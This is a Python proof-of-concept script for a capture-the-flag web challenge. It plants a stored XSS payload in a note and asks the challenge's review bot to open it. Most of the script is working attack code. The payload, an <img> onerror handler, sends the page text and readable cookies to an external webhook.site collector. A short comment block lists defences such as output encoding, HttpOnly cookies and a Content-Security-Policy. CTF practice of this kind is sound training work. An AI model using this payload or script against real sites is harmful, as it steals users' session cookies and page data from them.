import requests
import time

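# Proof-of-concept for a CTF challenge: stores a note containing markup and
# asks the challenge's review bot to open it. It demonstrates stored XSS, i.e.
# the note body apparently being rendered as HTML without output encoding.
#
# Defender notes:
#   * Encoding or sanitising the note body on output stops the handler below
#     from ever running.
#   * document.cookie only exposes cookies that are not marked HttpOnly.
#   * A Content-Security-Policy that forbids inline event handlers and
#     restricts connect-src would block both the handler and the outbound
#     fetch to a third-party host.

# Challenge instance and the external collector that receives the callback.
BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# Upper bound in seconds for each HTTP call; requests waits indefinitely when
# no timeout is given, which would hang the script if the instance is down.
REQUEST_TIMEOUT = 15

# Broken <img> whose onerror handler sends the page text and readable cookies
# to WEBHOOK as a URL-encoded query parameter.
payload = f'<img src=x onerror="fetch(\'{WEBHOOK}?flag=\'+encodeURIComponent(document.body.innerText+\'|\'+document.cookie))">'

print("[*] Creating paste with XSS payload...")
print(f"[*] Webhook: {WEBHOOK}")

# The context manager closes the pooled connections when the script finishes.
with requests.Session() as session:
    # Redirects are not followed so the Location header of the 302 (the path
    # of the new note) can be read directly.
    response = session.post(
        f"{BASE_URL}/note/new",
        data={
            "title": "Test Note",
            "body": payload
        },
        allow_redirects=False,
        timeout=REQUEST_TIMEOUT,
    )

    location = response.headers.get('Location')

    if response.status_code == 302 and location:
        note_url = f"{BASE_URL}{location}"
        print(f"[+] Paste created: {note_url}")

        # The report endpoint is given the note path as returned by the
        # server; a 202 is treated as "visit queued".
        print("[*] Reporting note to bot...")
        report_response = session.post(
            f"{BASE_URL}/report",
            data={"url": location},
            timeout=REQUEST_TIMEOUT,
        )

        if report_response.status_code == 202:
            # Derive the inbox link from WEBHOOK so the two cannot drift apart.
            webhook_id = WEBHOOK.rstrip("/").rsplit("/", 1)[-1]
            print("[+] Report queued! Bot will visit the page.")
            print(f"[*] Check your webhook at: https://webhook.site/#!/{webhook_id}")
            print("[*] Waiting 35 seconds for bot to visit...")
            # Fixed wait; the bot's real schedule is not visible from here.
            time.sleep(35)
            print("[+] Bot should have visited. Check webhook for flag!")
        else:
            print(f"[-] Failed to report: {report_response.status_code}")
            print(report_response.text)
    else:
        # Also reached when a 302 arrives without a Location header, which
        # would otherwise produce a note URL ending in "None".
        print(f"[-] Failed to create paste: {response.status_code}")
        print(response.text)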
